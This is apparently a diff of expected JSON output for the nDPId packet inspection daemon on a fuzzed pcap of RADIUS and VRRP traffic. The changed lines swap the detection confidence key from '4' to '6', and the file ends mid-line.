01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1528997476761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997476761,"pkt":"AAAMB6xAABRP+4rqCABFAALHIQ9AAP8RAAAKDEAexuIlAHIQBxQCswAAAVkCqxzt3wAE2R1LMmmDUD0Gdm8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwJQAAADghDQM3N0xbIqZkATUwMzExNDgwMjUwODY0NjI4QHdsYW4uVm6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1528997632285,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997632285,"pkt":"AAAMu6xAABRP+4rqCABFAALHIRFAAP9wAAAKDEAexuIZNXIQBxQCswAAAVsCq00mnArJWXX+N3JhhZON0ToaCgBDV8gOBFVTGgwAAFfIDQZ3aWZpGg8ACFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqcAATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxNS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNSkeJTZjLaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17664,"global_ts_msec":1528997632478} 00715{"packet_event_id":1,"packet_event_name":"packet","packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17664,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997632285,"pkt":"ABRP+4rqcNuYVcUnRQBFAAEwA2FAAPwRUBrG4hk1CgxAHgcUchABHGYCAlsBFPJGkwRL+pjdA5197qGahcwaCwAAV8gbBVNQQxpuAAABNxA06\/sNxTnxG6ukTqwhWbbA2iqJ9xUQWB4T5BwZI+vaxI+7bs\/vfw\/eMzQ3J3YR5Fh5RZWRNDm4c5zmNtk9aBmMKxf9+K7wySD8NYXouGgH0g5FMhfbrMBBWqKOxwRMjh\/pBwtArUnjATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNmZmLzAwOjU2OmNkOjZkOjQyOjU5LzIyNyUAMjAxMjU0NDIzNRIJU3Vj42VzcxkFU1BDTwYDAgAEUBLN9Y5G45qq3LYn60raic1U"} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1528996068129,"flow_last_seen":1528997632064,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":38604,"flow_avg_l4_payload_len":448,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1528996068129,"flow_last_seen":1528997632064,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":38604,"flow_avg_l4_payload_len":448,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997654780,"flow_last_seen":1528997654780,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997654780,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1528997654780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"thread_ts_msec":1528997654780,"pkt":"AAAMB6xAABRP+4rqCABFAALbtO9AAP8RAAAKDEAexuIZPnIQBxQCxwAAAVwCv7knE2qlA0dSDjfn0lqV5KwaCgAAV8gOBF1TGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqcWATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XeUZpQWNjZXNzBQYAAAAIGjEAAABJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMHAwMDAgYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBmoAAQIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjM5cHBuZXR3b3JrWG9yZxoUAABXyAcOVlpXQzJUZXN0TGFiZAoAAFfICARFVBoQAABXyAoKUyUAbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRElAFcgQzIgVGVzdCBMYWIaCwAAR8glBVZ6VxoNAAA4IQ4HMDcwNzEaDAAAJbNNBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bS9pRmVjdBoMAAAFgwcGwFBKm